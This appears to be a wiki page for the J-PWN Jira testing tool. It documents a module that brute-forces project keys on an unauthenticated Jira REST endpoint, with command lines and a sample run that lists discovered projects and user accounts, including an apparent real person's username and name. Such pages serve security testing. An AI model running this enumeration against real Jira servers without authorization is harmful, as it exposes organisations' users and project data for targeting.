Unauthenticated Projectkey Enumeration & Users Assignable to Projects - carnal0wnage/J-PWN GitHub Wiki

Unauthenticated Projectkey Enumeration & Users Assignable to Projects

Category: [Info Disclosure | Enumeration]

[CG] This module attempts to brute force projectkey names against the url: /rest/api/2/user/assignable/multiProjectSearch?projectKeys=$PROJECTKEY

module name: check_unauthenticated_projectkey_enumeration

url: /rest/api/2/user/assignable/multiProjectSearch?projectKeys=$PROJECTKEY

Examples:

Brute force projectkey AA-ZZ

python3 j-pwn.py --single https://JIRASERVER --module check_unauthenticated_projectkey_enumeration --path /jira/ --start_id 2 --end_id 2

Brute force projectkey AA-ZZZ

python3 j-pwn.py --single https://JIRASERVER --module check_unauthenticated_projectkey_enumeration --path /jira/ --start_id 2 --end_id 3

Example run:

[Testing URL]: https://JIRASERVER/jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=ES

+ Found ProjectKey: ES | URL: https://JIRASERVER/jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=ES

  Enumerated Users:
    - Username: addon_com.gliffy.integration.jira
      Display Name: Gliffy Diagrams for JIRA Cloud
      Key: addon_com.gliffy.integration.jira
      Time Zone: America/New_York
      Active: True
    - Username: addon_com.javahollic.jira.jemh-ui
      Display Name: JEMHCloud Add-On
      Key: addon_com.javahollic.jira.jemh-ui
      Time Zone: America/New_York
      Active: True
    - Username: pvirk
      Display Name: Prabhjeet
      Key: pvirk
      Time Zone: America/New_York
      Active: True


[Testing URL]: https://JIRASERVER/jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=FE
- No ProjectKey Enumeration vulnerability detected for ProjectKey: FE
- HTTP Status Code: 404

+ Vulnerabilities Found:
+ [Info Disclosure - Project Enumeration] Found ProjectKey: VL | URL: https://JIRASERVER/jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=VL
+ [Info Disclosure - Project Enumeration] Found ProjectKey: AW | URL: https://JIRASERVER/jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=AW
+ [Info Disclosure - Project Enumeration] Found ProjectKey: ES | URL: https://JIRASERVER/jira/rest/api/2/user/assignable/multiProjectSearch?projectKeys=ES

refs https://developer.atlassian.com/cloud/jira/platform/rest/v2/api-group-user-search/#api-rest-api-2-user-assignable-multiprojectsearch-get